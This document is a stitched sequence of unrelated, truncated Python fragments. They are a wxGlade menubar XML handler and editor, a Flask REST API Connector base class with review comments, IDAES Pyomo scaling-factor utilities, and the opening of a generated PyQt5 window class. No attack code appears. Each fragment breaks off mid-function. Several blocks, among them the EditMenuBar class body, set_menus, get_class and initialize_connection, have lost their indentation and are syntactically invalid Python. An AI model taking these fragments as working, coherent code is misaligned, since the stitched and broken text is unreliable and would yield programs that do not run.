    <menus> section and hands them to the owning EditMenuBar."""
    # per-item child tags, in the order their char data is stored
    itemattrs = ['label', 'id', 'name', 'help_str', 'checkable', 'radio', 'handler']

    def __init__(self, owner):
        super(MenuHandler, self).__init__()
        self.owner = owner          # the EditMenuBar being populated
        self.menus = []             # completed top-level MenuTree instances
        self.curr_menu = []         # stack of (node,) / (node, menu) tuples
        self.curr_item = None       # item node currently being filled
        self.curr_index = 0         # index into itemattrs for char_data
        self.menu_depth = 0         # nesting depth of <menu> tags

    def start_elem(self, name, attrs):
        if name == 'menus': return
        if name == 'menu':
            self.menu_depth += 1
            if self.menu_depth == 1:
                # top-level menu: start a new tree
                t = MenuTree(attrs['name'],
                             attrs['label'],
                             attrs.get('itemid', ''),
                             attrs.get('help_str', ''),
                             handler=attrs.get('handler', ''))
                self.curr_menu.append( (t.root,) )
                #self.owner.menus.append(t)
                #self.owner.properties["menus"].value.append(t)
                self.menus.append(t)
                return
            # nested menu: attach as a child of the current menu node
            node = MenuTree.Node(label=attrs['label'],
                                 name=attrs['name'],
                                 id=attrs.get('itemid', ''),
                                 help_str=attrs.get('help_str', ''),
                                 handler=attrs.get('handler', ''))
            cm = self.curr_menu[-1]
            cm[0].children.append(node)
            node.parent = cm[0]
            menu = wx.Menu()
            self.curr_menu.append( (node, menu) )
        elif name == 'item':
            self.curr_item = MenuTree.Node()
        else:
            # a per-item attribute tag; its char data fills itemattrs[curr_index]
            try: self.curr_index = self.itemattrs.index(name)
            except ValueError:
                # ignore unknown attributes...
                self.curr_index = -1
                pass

    def end_elem(self, name):
        if name == 'item':
            if self.curr_item.handler == self.curr_item.name == self.curr_item.label == '---' and not self.curr_item.id:
                # fix bug from 0.8 where separators were created with handler '---' instead of id
                self.curr_item.id = '---'
                self.curr_item.handler = ''
            try: cm = self.curr_menu[-1]
            except IndexError:
                from xml_parse import XmlParsingError
                raise XmlParsingError(_("menu item outside a menu"))
            cm[0].children.append(self.curr_item)
            self.curr_item.parent = cm[0]
        elif name == 'menu':
            self.menu_depth -= 1
            self.curr_menu.pop()
        elif name == 'menus':
            # hand the rebuilt trees to the owner's property in one shot
            #self.owner.set_menus(self.owner.menus)
            #self.owner.properties["menus"].set(self.owner.menus)
            self.owner.properties["menus"].set(self.menus)
            self.owner.properties_changed(["menus"])
            return True

    def char_data(self, data):
        super(MenuHandler, self).char_data(data)
        char_data = self.get_char_data()
        # store the tag's text on the attribute selected in start_elem
        setattr(self.curr_item, self.itemattrs[self.curr_index], char_data)
class EditMenuBar(EditBase, PreviewMixin):
__hidden_frame = None # used on GTK to reparent a menubar before deletion
_PROPERTIES = ["menus", "preview"]
PROPERTIES = EditBase.PROPERTIES + _PROPERTIES + EditBase.EXTRA_PROPERTIES
def __init__(self, name, klass, parent):
    """Creates the menubar editor; a menubar without a parent frame is
    treated as a standalone/top-level custom class with its own preview."""
    custom_class = parent is None
    EditBase.__init__(self, name, klass, parent, wx.NewId(), custom_class=custom_class)
    self.base = 'wxMenuBar'
    self.menus = MenuProperty()
    self.window_id = None  # just a dummy for code generation
    self._mb = None  # the real menubar
    if not self.parent:
        PreviewMixin.__init__(self)  # add a preview button
        self._is_toplevel = True
    else:
        self.preview = None
        self._is_toplevel = False
def create_widget(self):
    """Creates the wx widget(s): either a real menubar attached to the parent
    frame, or a small standalone frame hosting the menubar when top-level."""
    # On GTK a menubar cannot be deleted while attached; keep a hidden frame
    # around so it can be reparented there first (see class attribute).
    if wx.Platform == '__WXGTK__' and not EditMenuBar.__hidden_frame:
        EditMenuBar.__hidden_frame = wx.Frame(common.main, -1, "")
        EditMenuBar.__hidden_frame.Hide()
    if self.parent:
        self.widget = self._mb = wx.MenuBar()
        if self.parent.widget: self.parent.widget.SetMenuBar(self.widget)
        if wx.Platform == '__WXMSW__' or wx.Platform == '__WXMAC__':
            # avoid stealing keyboard focus on these platforms
            self.widget.SetFocus = lambda : None
    else:
        # "top-level" menubar
        self.widget = wx.Frame(None, -1, misc.design_title(self.name))
        self.widget.SetClientSize((400, 30))
        self._mb = wx.MenuBar()
        self.widget.SetMenuBar(self._mb)
        self.widget.SetBackgroundColour(self._mb.GetBackgroundColour())
        import os
        icon = compat.wx_EmptyIcon()
        xpm = os.path.join(config.icons_path, 'menubar.xpm')
        icon.CopyFromBitmap(misc.get_xpm_bitmap(xpm))
        self.widget.SetIcon(icon)
        # closing the design frame only hides it; clicking grabs focus
        self.widget.Bind(wx.EVT_CLOSE, lambda e: self.hide_widget())
        self.widget.Bind(wx.EVT_LEFT_DOWN, self.on_set_focus)
    self.set_menus()  # show the menus
def set_menus(self):
if not self._mb: return # nothing left to do
for i in range(self._mb.GetMenuCount()):
self._mb.Remove(0)
def append(menu, items):
for item in items:
if item.name == '---': # item is a separator
menu.AppendSeparator()
elif item.children:
m = wx.Menu()
append(m, item.children)
menu.AppendMenu( wx.NewId(), misc.wxstr(item.label), m, misc.wxstr(item.help_str) | |
<filename>restapi/connectors/__init__.py
import abc
import os
from datetime import datetime, timedelta
from pathlib import Path
from types import ModuleType, TracebackType
from typing import Any, Dict, Generic, List, Optional, Tuple, Type, TypeVar
# mypy: ignore-errors
from flask import Flask
from flask import _app_ctx_stack as stack
from restapi.config import (
ABS_RESTAPI_PATH,
BACKEND_PACKAGE,
CUSTOM_PACKAGE,
EXTENDED_PACKAGE,
EXTENDED_PROJECT_DISABLED,
TESTING,
)
from restapi.env import Env
from restapi.exceptions import ServiceUnavailable
from restapi.services.authentication import BaseAuthentication, NoAuthentication
from restapi.tests_initialization import initialize_testing_environment
from restapi.utilities import print_and_exit
from restapi.utilities.globals import mem
from restapi.utilities.logs import log
from restapi.utilities.meta import Meta
# https://mypy.readthedocs.io/en/latest/generics.html#generic-methods-and-generic-self
T = TypeVar("T", bound="Connector")

CONNECTORS_FOLDER = "connectors"

NO_AUTH = "NO_AUTHENTICATION"

# thread-id.ConnectorName.params-unique-key = instance
InstancesCache = Dict[int, Dict[str, Dict[str, T]]]

# service-name => dict of variables
Services = Dict[str, Dict[str, str]]

# Exception types reported by a connector's get_connection_exception().
# Fixed: Tuple[Type[Exception]] typed a 1-tuple only; connectors may report
# several exception types, so the tuple must be variadic.
ExceptionsList = Optional[Tuple[Type[Exception], ...]]
class Connector(metaclass=abc.ABCMeta):
authentication_service: str = Env.get("AUTH_SERVICE", NO_AUTH)
# Available services with associated env variables
services: Services = {}
# Assigned by init_app
app: Flask = None
# Used by get_authentication_module
_authentication_module: Optional[ModuleType] = None
# Returned by __getattr__ in neo4j, sqlalchemy and mongo connectors
_models: Dict[str, Type] = {}
# Used by set_object and get_object
_instances: InstancesCache = {}
def __init__(self) -> None:
    """Initialize the connector name and disconnect bookkeeping."""
    # This is the folder name corresponding to the connector name:
    # self.__class__.__module__ == restapi.connectors.sqlalchemy
    # .split(".") == ['restapi', 'connectors', 'sqlalchemy']
    # [-1] == 'sqlalchemy'
    # (A previous assignment of the lower-cased class name was dead code —
    # it was immediately overwritten by this one — and has been removed.)
    self.name = self.__class__.__module__.split(".")[-1]
    # Will be modified by self.disconnect()
    self.disconnected = False
    # Added to convince mypy that self.app cannot be None
    if self.app is None:  # pragma: no cover
        # This should never happen because app is
        # assigned during init_services
        from flask import current_app
        self.app = current_app
@staticmethod
def init() -> None:
    """Discover and register all available connectors.
    Connectors are loaded from core, then the extended project (if any),
    then the custom project — later loads can override earlier entries in
    Connector.services — and finally their models are loaded."""
    if Connector.authentication_service == NO_AUTH:
        log.info("No Authentication service configured")
    else:
        log.debug("Authentication service: {}", Connector.authentication_service)
    Connector.services = Connector.load_connectors(
        ABS_RESTAPI_PATH, BACKEND_PACKAGE, Connector.services
    )
    if EXTENDED_PACKAGE != EXTENDED_PROJECT_DISABLED:
        Connector.services = Connector.load_connectors(
            Path(EXTENDED_PACKAGE),
            EXTENDED_PACKAGE,
            Connector.services,
        )
    Connector.services = Connector.load_connectors(
        Path(CUSTOM_PACKAGE), CUSTOM_PACKAGE, Connector.services
    )
    Connector.load_models(Connector.services.keys())
def __del__(self) -> None:
    # Best-effort cleanup at garbage collection; disconnect() may already
    # have run via __exit__ or an explicit call, hence the flag check.
    if not self.disconnected:
        self.disconnect()
def __enter__(self: T) -> T:
    # Context-manager entry: the connector instance itself is the resource.
    return self
def __exit__(
    self,
    exctype: Optional[Type[Exception]],
    excinst: Optional[Exception],
    exctb: Optional[TracebackType],
) -> bool:
    # Disconnect on context-manager exit unless already disconnected.
    if not self.disconnected:
        self.disconnect()
        # NOTE(review): returning True from __exit__ SUPPRESSES any exception
        # raised inside the `with` block — confirm this is intentional.
        return True
    return False  # pragma: no cover
@staticmethod
@abc.abstractmethod
def get_connection_exception() -> ExceptionsList:  # pragma: no cover
    # Subclasses return the exception types that signal a failed connection;
    # the base implementation reports none.
    return None
@abc.abstractmethod
def connect(self: T, **kwargs: Any) -> T:  # pragma: no cover
    """Open the underlying connection and return the connector itself.

    Fixed return annotation: `Generic[T]` is not a valid return type for a
    method returning the instance; the fluent return type is `T`.
    """
    return self
@abc.abstractmethod
def disconnect(self) -> None:  # pragma: no cover
    # Subclasses close the underlying connection; they are expected to set
    # self.disconnected accordingly.
    return
@abc.abstractmethod
def is_connected(instance: T) -> bool:  # pragma: no cover
    # NOTE(review): the first parameter is the instance itself but is named
    # `instance` instead of `self`; it still behaves as a normal method.
    # Confirm before renaming — keyword callers (if any) would break.
    return True
def destroy(self) -> None:  # pragma: no cover
    # Drop the underlying service's data; subclasses must override —
    # the default aborts the whole process with an error message.
    print_and_exit("Missing destroy method in {}", self.__class__.__name__)
def initialize(self) -> None:  # pragma: no cover
    # Initialize the underlying service; subclasses must override —
    # the default aborts the whole process with an error message.
    print_and_exit("Missing initialize method in {}", self.__class__.__name__)
@property
def variables(self) -> Dict[str, str]:
    """Environment variables configured for this connector (empty dict
    when the connector is unknown or has no variables)."""
    configured = self.services.get(self.name)
    return configured if configured else {}
@classmethod
def load_connectors(cls, path: Path, module: str, services: Services) -> Services:
    """Scan `path`/connectors for connector packages, load each connector's
    env variables and class, and merge enabled ones into `services`.
    Returns the (mutated) services mapping."""
    main_folder = path.joinpath(CONNECTORS_FOLDER)
    if not main_folder.is_dir():
        log.debug("Connectors folder not found: {}", main_folder)
        return services
    for connector in main_folder.iterdir():
        if not connector.is_dir():
            continue
        connector_name = connector.name
        # skip private folders like __pycache__
        if connector_name.startswith("_"):
            continue
        # This is the only exception... we should rename sqlalchemy as alchemy
        if connector_name == "sqlalchemy":
            variables = Env.load_variables_group(prefix="alchemy")
        else:
            variables = Env.load_variables_group(prefix=connector_name)
        if not Env.to_bool(
            variables.get("enable_connector", True)
        ):  # pragma: no cover
            log.debug("{} connector is disabled", connector_name)
            continue
        # a non-empty HOST variable marks an externally-provided service
        external = False
        if "host" in variables:
            if host := variables.get("host"):
                external = cls.is_external(host)
            # HOST found in variables but empty... never happens during tests
            else:  # pragma: no cover
                variables["enable"] = "0"
        enabled = Env.to_bool(variables.get("enable"))
        # Celery is always enabled, if connector is enabled
        # No further check is needed on host/external
        available = enabled or external or connector_name == "celery"
        if not available:
            continue
        connector_module = Connector.get_module(connector_name, module)
        connector_class = Connector.get_class(connector_module)
        # Can't test connector misconfiguration...
        if not connector_class:  # pragma: no cover
            log.error("No connector class found in {}/{}", main_folder, connector)
            continue
        try:
            # This is to test the Connector compliance,
            # i.e. to verify instance and get_instance in the connector module
            # and verify that the Connector can be instanced
            connector_module.instance
            connector_module.get_instance
            connector_class()
        except AttributeError as e:  # pragma: no cover
            print_and_exit(e)
        services[connector_name] = variables
        log.debug("Got class definition for {}", connector_class)
    return services
@staticmethod
def load_models(connectors: List[str]) -> None:
    """Load and inject models for every given connector.

    For each connector shipping a core models.py, import the core models
    (mandatory) plus optional extended/custom models and hand them to the
    connector class via set_models.

    Args:
        connectors: names of the enabled connectors. NOTE(review): callers
            pass dict keys (see Connector.init), so an Iterable[str]
            annotation would be more accurate — confirm before widening.
    """
    # Fix: this is invoked as Connector.load_models(...) without an instance,
    # so it must be declared @staticmethod (it previously relied on
    # plain-function class access, which runs but confuses type checkers).
    for connector in connectors:
        # Models are strictly core-dependent. If you need to enable models starting
        # from a custom connector this function has to be refactored:
        # 1) now is checked the existence of models.py in ABS_RESTAPI_PATH/connector
        # 2) Core model is mandatory
        # 3) Connector class, used to inject models is taken from BACKEND_PACKAGE
        models_path = ABS_RESTAPI_PATH.joinpath(
            CONNECTORS_FOLDER, connector, "models.py"
        )
        if not models_path.is_file():
            log.debug("No model found for {}", connector)
            continue

        log.debug("Loading models from {}", connector)

        base_models = Meta.import_models(connector, BACKEND_PACKAGE, mandatory=True)
        if EXTENDED_PACKAGE == EXTENDED_PROJECT_DISABLED:
            extended_models: Dict[str, Type] = {}
        else:
            extended_models = Meta.import_models(connector, EXTENDED_PACKAGE)
        custom_models = Meta.import_models(connector, CUSTOM_PACKAGE)

        log.debug(
            "Models loaded from {}: core {}, extended {}, custom {}",
            connector,
            len(base_models),
            len(extended_models),
            len(custom_models),
        )

        connector_module = Connector.get_module(connector, BACKEND_PACKAGE)
        connector_class = Connector.get_class(connector_module)
        if connector_class:
            connector_class.set_models(base_models, extended_models, custom_models)
        else:  # pragma: no cover
            log.error("Connector class not found for {}", connector)
@staticmethod
def get_module(connector: str, module: str) -> Optional[ModuleType]:
    """Import and return module.<connectors folder>.connector, or None."""
    dotted_path = f"{module}.{CONNECTORS_FOLDER}.{connector}"
    return Meta.get_module_from_string(dotted_path)
@staticmethod
def get_class(connector_module: Optional[ModuleType]) -> Optional[Type]:
if not connector_module: # pragma: no cover
return False
classes = Meta.get_new_classes_from_module(connector_module)
for connector_class in classes.values():
if issubclass(connector_class, Connector):
return connector_class
return None # pragma: no cover
@staticmethod
def get_authentication_instance() -> BaseAuthentication:
    """Return a fresh instance of the configured authentication backend.

    Returns NoAuthentication when authentication is disabled; otherwise the
    Authentication class from the auth connector module.

    Raises:
        ServiceUnavailable: if the authentication module cannot be imported.
    """
    if Connector.authentication_service == NO_AUTH:
        return NoAuthentication()

    # Import the auth module only once and cache it on the class
    if not Connector._authentication_module:
        Connector._authentication_module = Connector.get_module(
            Connector.authentication_service, BACKEND_PACKAGE
        )

    if not Connector._authentication_module:  # pragma: no cover
        log.critical("{} not available", Connector.authentication_service)
        raise ServiceUnavailable("Authentication service not available")

    return Connector._authentication_module.Authentication()
@staticmethod
def init_app(app: Flask, worker_mode: bool = False) -> None:
    """Bind the Flask app to the Connector class and init the auth module.

    Args:
        app: the Flask application, stored on Connector.app
        worker_mode: unused in this method — presumably consumed by callers
            or subclasses; TODO confirm before removing
    """
    Connector.app = app

    if Connector.authentication_service == NO_AUTH:
        return

    # The configured auth service must be among the loaded connectors
    if (
        Connector.authentication_service not in Connector.services
    ):  # pragma: no cover
        print_and_exit(
            "Auth service '{}' is not available", Connector.authentication_service
        )

    authentication_instance = Connector.get_authentication_instance()
    authentication_instance.module_initialization()
@staticmethod
def project_init(options: Optional[Dict[str, bool]] = None) -> None:
    """Initialize the project: auth database, custom initializer, test data.

    Args:
        options: flags forwarded to init_auth_db (defaults to {})
    """
    if Connector.authentication_service != NO_AUTH:
        authentication_instance = Connector.get_authentication_instance()

        connector_module = Connector.get_module(
            Connector.authentication_service, BACKEND_PACKAGE
        )
        # NOTE(review): get_module may return None, in which case the next
        # line raises AttributeError — confirm the auth module is always
        # importable at this point.
        connector = connector_module.get_instance()
        log.debug("Initializing {}", Connector.authentication_service)
        connector.initialize()

        if options is None:
            # NOTE(review): re-annotating a parameter is rejected by mypy;
            # a plain `options = {}` would be cleaner
            options: Dict[str, bool] = {}

        with Connector.app.app_context():
            authentication_instance.init_auth_db(options)
            log.info("Initialized authentication module")

        initializer = mem.initializer()
        if initializer:
            log.info("Vanilla project has been initialized")
        else:  # pragma: no cover
            log.error("Errors during custom initialization")

        if TESTING:
            # Core test initialization
            initialize_testing_environment(authentication_instance)
            # Custom test initialization
            initializer.initialize_testing_environment()
@staticmethod
def project_clean() -> None:
    """Destroy the content of the authentication service, if one is enabled."""
    if Connector.authentication_service != NO_AUTH:
        connector_module = Connector.get_module(
            Connector.authentication_service, BACKEND_PACKAGE
        )
        # NOTE(review): get_module may return None — confirm the auth module
        # is always importable here before calling get_instance on it
        connector = connector_module.get_instance()
        log.debug("Destroying {}", Connector.authentication_service)
        connector.destroy()
@classmethod
def set_models(
    cls,
    base_models: Dict[str, Type],
    extended_models: Dict[str, Type],
    custom_models: Dict[str, Type],
) -> None:
    """Merge core, extended and custom models into cls._models.

    Later sources win: extended models override core models, and custom
    models override both (join strategy described by issue #16).

    Args:
        base_models: mandatory core models
        extended_models: models from the extended project (may be empty)
        custom_models: models from the custom project (may be empty)
    """
    # Fix: copy instead of aliasing, so the caller's base_models dict is not
    # mutated as a side effect of the merge below.
    cls._models = dict(base_models)

    for override_source in (extended_models, custom_models):
        for key, model in override_source.items():
            # Log genuine overrides (same key, compatible subclass)...
            if key in cls._models and issubclass(
                model, cls._models[key]
            ):  # pragma: no cover
                log.debug("Overriding model {}", key)
            # ...but in every case the later source replaces/appends the model
            cls._models[key] = model

    if cls._models:
        log.debug("Models loaded")
@staticmethod
def is_external(host: str) -> bool:
return not host.endswith(".dockerized.io")
@classmethod
def set_object(cls, name: str, obj: T, key: str = "[]") -> None:
    """Store a connector instance in the per-process registry."""
    pid = os.getpid()
    per_process = cls._instances.setdefault(pid, {})
    per_process.setdefault(name, {})[key] = obj
@classmethod
def get_object(cls, name: str, key: str = "[]") -> Optional[T]:
    """Fetch a previously stored connector instance, or None if missing."""
    pid = os.getpid()
    per_process = cls._instances.setdefault(pid, {})
    return per_process.setdefault(name, {}).get(key)
# From server.teardown... not executed during tests
@classmethod
def disconnect_all(cls) -> None:  # pragma: no cover
    """Disconnect every registered instance and clear the registry.

    Iterates the whole per-process registry (pid -> name -> key -> instance)
    and disconnects any instance that is still connected.
    """
    for connectors in cls._instances.values():
        for instances in connectors.values():
            for instance in instances.values():
                if not instance.disconnected:
                    log.info(
                        "Disconnecting {} {}", instance.name, hex(id(instance))
                    )
                    instance.disconnect()

    cls._instances.clear()

    log.info("[{}] All connectors disconnected", os.getpid())
def initialize_connection(
self, expiration: int, verification: int, **kwargs: str
) -> T:
# Create a new instance of itself
obj = self.__class__()
exceptions = obj.get_connection_exception()
if exceptions is None:
exceptions = (Exception,)
try:
obj = obj.connect(**kwargs)
except exceptions as e:
log.error("{} raised {}: {}", obj.name, e.__class__.__name__, e)
raise ServiceUnavailable(
{
"Service Unavailable": "This service is temporarily unavailable, "
"please retry in a few minutes"
}
)
obj.connection_time = datetime.now()
obj.connection_verification_time = None
if verification > 0:
ver = obj.connection_time + timedelta(seconds=verification)
obj.connection_verification_time = ver
obj.connection_expiration_time = None
if expiration > 0:
| |
<gh_stars>0
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
This module contains utilities to provide variable and expression scaling
factors by providing an expression to calculate them via a suffix.
The main purpose of this code is to use the calculate_scaling_factors function
to calculate scaling factors to be used with the Pyomo scaling transformation or
with solvers. A user can provide a scaling_expression suffix to calculate scale
factors from existing variable scaling factors. This allows scaling factors from
a small set of fundamental variables to be propagated to the rest of the model.
The scaling_expression suffix contains Pyomo expressions with model variables.
The expressions can be evaluated with variable scaling factors in place of
variables to calculate additional scaling factors.
"""
__author__ = "<NAME>, <NAME>, <NAME>"
from math import log10
import scipy.sparse.linalg as spla
import scipy.linalg as la
import pyomo.environ as pyo
from pyomo.core.expr.visitor import identify_variables
from pyomo.network import Arc
from pyomo.contrib.pynumero.interfaces.pyomo_nlp import PyomoNLP
from pyomo.common.modeling import unique_component_name
from pyomo.core.base.constraint import _ConstraintData
from pyomo.common.collections import ComponentMap
from pyomo.util.calc_var_value import calculate_variable_from_constraint
import idaes.logger as idaeslog
_log = idaeslog.getLogger(__name__)
def __none_mult(x, y):
    """PRIVATE FUNCTION: return x * y, propagating None — the product is
    None whenever either factor is None."""
    if x is None or y is None:
        return None
    return x * y
def scale_arc_constraints(blk):
    """Find Arc constraints in a block and its subblocks. Then scale them based
    on the minimum scaling factor of the variables in the constraint.

    Args:
        blk: Block in which to look for Arc constraints to scale.

    Returns:
        None
    """
    for arc in blk.component_data_objects(Arc, descend_into=True):
        arc_block = arc.expanded_block
        if arc_block is None:  # arc not expanded or port empty?
            _log.warning(
                f"{arc} has no constraints. Has the Arc expansion transform "
                "been applied?")
            continue
        for c in arc_block.component_data_objects(pyo.Constraint, descend_into=True):
            # Scale by the smallest variable scaling factor so no variable in
            # the equality is scaled out of range
            sf = min_scaling_factor(identify_variables(c.body))
            constraint_scaling_transform(c, sf)
def map_scaling_factor(iter, default=1, warning=False, func=min, hint=None):
    """Apply func to the scaling factors of an iterable of Pyomo components.

    This can be used, for example, to get the minimum or maximum scaling
    factor of a set of components.

    Args:
        iter: iterable yielding Pyomo components
        default: value used when a component has no scaling factor (default 1)
        warning: if True, log a warning for each missing scaling factor
        func: reduction applied to the scaling factors (default min)
        hint: extra text for warnings, to help locate missing factors

    Returns:
        The result of func on the set of scaling factors
    """
    factors = (
        get_scaling_factor(component, default=default, warning=warning, hint=hint)
        for component in iter
    )
    return func(factors)
def min_scaling_factor(iter, default=1, warning=True, hint=None):
    """Map get_scaling_factor to an iterable of Pyomo components, and get the
    minimum scaling factor.

    Args:
        iter: Iterable yielding Pyomo components
        default: The default value used when a scaling factor is missing. If
            None, this will raise an exception when scaling factors are missing.
            The default is default=1.
        warning: Log a warning for missing scaling factors
        hint: Paired with warning=True, this is a string to indicate where the
            missing scaling factor was being accessed, to easier diagnose issues.

    Returns:
        Minimum scaling factor of the components in iter
    """
    # Fix: forward hint to map_scaling_factor — it was previously accepted
    # here but silently dropped, so warnings lost their location hint.
    return map_scaling_factor(
        iter, default=default, warning=warning, func=min, hint=hint
    )
def propagate_indexed_component_scaling_factors(
        blk,
        typ=None,
        overwrite=False,
        descend_into=True):
    """Use the parent component scaling factor to set all component data object
    scaling factors.

    Args:
        blk: The block on which to search for components
        typ: Component type(s) (default=(Var, Constraint, Expression))
        overwrite: if a data object already has a scaling factor should it be
            overwritten (default=False)
        descend_into: descend into child blocks (default=True)
    """
    if typ is None:
        typ = (pyo.Var, pyo.Constraint, pyo.Expression)

    for c in blk.component_objects(typ, descend_into=descend_into):
        # Only indexed components that carry a parent-level factor matter here
        if get_scaling_factor(c) is not None and c.is_indexed():
            for cdat in c.values():
                if overwrite or get_scaling_factor(cdat) is None:
                    set_scaling_factor(cdat, get_scaling_factor(c))
def calculate_scaling_factors(blk):
    """Look for calculate_scaling_factors methods and run them. This uses a
    recursive function to execute the subblock calculate_scaling_factors
    methods first.
    """
    def cs(blk2):
        """Recursively process subblocks first, then blk2 itself."""
        for b in blk2.component_data_objects(pyo.Block, descend_into=False):
            cs(b)
        if hasattr(blk2, "calculate_scaling_factors"):
            blk2.calculate_scaling_factors()
    # Call recursive function to run calculate_scaling_factors on blocks from
    # the bottom up.
    cs(blk)
    # If a scale factor is set for an indexed component, propagate it to the
    # component data if a scale factor hasn't already been explicitly set
    propagate_indexed_component_scaling_factors(blk)
    # Use the variable scaling factors to scale the arc constraints.
    scale_arc_constraints(blk)
def set_scaling_factor(c, v, data_objects=True):
    """Set a scaling factor for a model component. This function creates the
    scaling_factor suffix if needed.

    Args:
        c: component to supply scaling factor for; a plain float/int is
            accepted and treated as a constant (no suffix is touched)
        v: scaling factor
        data_objects: set scaling factors for indexed data objects (default=True)

    Returns:
        1 if c is a plain float/int (scale factor of a constant),
        otherwise None
    """
    if isinstance(c, (float, int)):
        # property packages can return 0 for material balance terms on components
        # doesn't exist. This handles the case where you get a constant 0 and
        # need it's scale factor to scale the mass balance.
        return 1
    try:
        suf = c.parent_block().scaling_factor
    except AttributeError:
        # The suffix does not exist on this block yet: create it (EXPORT so
        # it is passed on to solvers)
        c.parent_block().scaling_factor = pyo.Suffix(direction=pyo.Suffix.EXPORT)
        suf = c.parent_block().scaling_factor

    suf[c] = v
    if data_objects and c.is_indexed():
        for cdat in c.values():
            suf[cdat] = v
def get_scaling_factor(c, default=None, warning=False, exception=False, hint=None):
    """Get a component scale factor.

    Args:
        c: component
        default: value to return if no scale factor exists (default=None)
        warning: whether to log a warning if a scaling factor is not found
            (default=False)
        exception: whether to raise an exception if a scaling factor is not
            found and no default is provided (default=False)
        hint: (str) a string to add to the warning or exception message to help
            locate the source.

    Returns:
        scaling factor (float)
    """
    try:
        sf = c.parent_block().scaling_factor[c]
    except (AttributeError, KeyError):
        # AttributeError: the block has no scaling_factor suffix at all
        # KeyError: the suffix exists but holds no entry for c
        if hint is None:
            h = ""
        else:
            h = f", {hint}"
        if warning:
            if hasattr(c, "is_component_type") and c.is_component_type():
                _log.warning(f"Missing scaling factor for {c}{h}")
            else:
                _log.warning(f"Trying to get scaling factor for unnamed expr {h}")
        # Only raise when the caller provided no fallback default
        if exception and default is None:
            if hasattr(c, "is_component_type") and c.is_component_type():
                _log.error(f"Missing scaling factor for {c}{h}")
            else:
                _log.error(f"Trying to get scaling factor for unnamed expr {h}")
            raise
        sf = default
    return sf
def unset_scaling_factor(c, data_objects=True):
    """Delete a component scaling factor.

    Args:
        c: component
        data_objects: also delete the scaling factors of indexed data
            objects (default=True)

    Returns:
        None
    """
    try:
        del c.parent_block().scaling_factor[c]
    except (AttributeError, KeyError):
        pass  # no scaling factor suffix, is fine

    if not data_objects:
        return
    try:
        is_indexed = c.is_indexed()
    except AttributeError:
        return  # not a component (e.g. a constant), nothing more to do
    if not is_indexed:
        return
    for cdat in c.values():
        # Fix: suppress per data object — previously a single missing entry
        # (KeyError) aborted the loop and left the remaining data objects'
        # scaling factors in place.
        try:
            del cdat.parent_block().scaling_factor[cdat]
        except (AttributeError, KeyError):
            pass  # no scaling factor suffix, is fine
def populate_default_scaling_factors(c):
    """
    Method to set default scaling factors for a number of common quantities
    based of typical values expressed in SI units. Values are converted to
    those used by the property package using Pyomo's unit conversion tools.
    """
    units = c.get_metadata().derived_units

    # Typical SI magnitudes, paired with the derived-unit key used to convert
    # them into the property package's own unit set (None = dimensionless,
    # no conversion needed)
    si_scale = {"temperature": (100*pyo.units.K, "temperature"),
                "pressure": (1e5*pyo.units.Pa, "pressure"),
                "dens_mol_phase": (100*pyo.units.mol/pyo.units.m**3,
                                   "density_mole"),
                "enth_mol": (1e4*pyo.units.J/pyo.units.mol, "energy_mole"),
                "entr_mol": (100*pyo.units.J/pyo.units.mol/pyo.units.K,
                             "entropy_mole"),
                "fug_phase_comp": (1e4*pyo.units.Pa, "pressure"),
                "fug_coeff_phase_comp": (1*pyo.units.dimensionless, None),
                "gibbs_mol": (1e4*pyo.units.J/pyo.units.mol, "energy_mole"),
                "mole_frac_comp": (0.001*pyo.units.dimensionless, None),
                "mole_frac_phase_comp": (0.001*pyo.units.dimensionless, None),
                "mw": (1e-3*pyo.units.kg/pyo.units.mol, "molecular_weight"),
                "mw_phase": (1e-3*pyo.units.kg/pyo.units.mol,
                             "molecular_weight")}

    for p, f in si_scale.items():
        # If a default scaling factor exists, do not overwrite it
        if p not in c.default_scaling_factor.keys():
            if f[1] is not None:
                # Convert the typical SI magnitude to the package's units
                v = pyo.units.convert(f[0], to_units=units[f[1]])
            else:
                v = f[0]
            # Scale factor = reciprocal, rounded to the nearest power of 10
            sf = 1/(10**round(log10(pyo.value(v))))
            c.set_default_scaling(p, sf)
def __set_constraint_transform_applied_scaling_factor(c, v):
    """PRIVATE FUNCTION Set the scaling factor used to transform a constraint.
    This is used to keep track of scaling transformations that have been applied
    to constraints.

    Args:
        c: component to supply scaling factor for
        v: scaling factor

    Returns:
        None
    """
    try:
        c.parent_block().constraint_transformed_scaling_factor[c] = v
    except AttributeError:
        # Suffix not created on this block yet; LOCAL direction because this
        # bookkeeping value is not meant to be exported to solvers
        c.parent_block().constraint_transformed_scaling_factor = pyo.Suffix(
            direction=pyo.Suffix.LOCAL)
        c.parent_block().constraint_transformed_scaling_factor[c] = v
def get_constraint_transform_applied_scaling_factor(c, default=None):
"""Get a the scale factor that was used to transform a
constraint.
Args:
c: constraint data object
default: value to return if no scaling factor exists (default=None)
Returns:
The scaling factor that has been used to transform the constraint or the
default.
"""
| |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/Users/j35/git/python_notebooks/notebooks/ui/ui_calibrated_transmission.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1347, 949)
MainWindow.setMinimumSize(QtCore.QSize(0, 300))
MainWindow.setLayoutDirection(QtCore.Qt.LeftToRight)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.tab)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.splitter_2 = QtWidgets.QSplitter(self.tab)
self.splitter_2.setOrientation(QtCore.Qt.Vertical)
